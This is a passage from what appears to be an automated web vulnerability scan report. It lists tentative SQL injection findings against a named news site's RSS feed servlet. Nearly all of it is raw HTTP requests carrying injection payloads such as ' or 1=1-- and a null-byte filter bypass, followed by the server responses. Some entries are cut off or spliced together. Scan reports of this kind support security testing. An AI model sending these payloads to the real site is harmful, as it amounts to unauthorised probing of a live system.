Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:48 GMT
Date: Tue, 07 Dec 2010 23:19:48 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.34. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200764.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568/200764.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:10 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200764.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:20:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:12 GMT
Content-Length: 11500
Connection: close
Set-Cookie: JSESSIONID=MIELIUOSWI45ICUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.35. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.36. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20373858'%20or%201%3d1--%20 and 20373858'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d1--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d2--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.37. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568/200765.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200765.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Content-Length: 5986
Connection: close
Set-Cookie: JSESSIONID=HHM2QH2YXU3WICUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.38. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200769.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200769.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 12899183'%20or%201%3d1--%20 and 12899183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d1--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d2--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.39. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200772.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 84226288'%20or%201%3d1--%20 and 84226288'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi84226288'%20or%201%3d1--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:13 GMT
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi84226288'%20or%201%3d2--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.40. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200772.xml

Issue detail

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.41. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200774.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200774.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20519805'%20or%201%3d1--%20 and 20519805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d1--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d2--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.42. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200775.xml [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200775.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568/200775.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200775.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:20:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:35 GMT
Content-Length: 9151
Connection: close
Set-Cookie: JSESSIONID=N1KD1P1UCQUPUCUUCAJSFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.43. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200776.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:23 GMT
Date: Tue, 07 Dec 2010 23:20:23 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.44. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200776.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200776.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:36 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200776.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.45. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200777.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200777.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 18366774'%20or%201%3d1--%20 and 18366774'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi18366774'%20or%201%3d1--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi18366774'%20or%201%3d2--%20/rss/CustomRssServlet/568/200777.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:21 GMT
Date: Tue, 07 Dec 2010 23:20:21 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.46. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200778.xml [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200778.xml

Request 2

GET /mngi11112058'%20or%201%3d2--%20/rss/CustomRssServlet/568/200781.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:34 GMT
Date: Tue, 07 Dec 2010 23:20:34 GMT
Content-Length: 424
Connection: close

<HTML>

<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

1.49. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200782.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/200782.xml

Issue detail

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200782.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
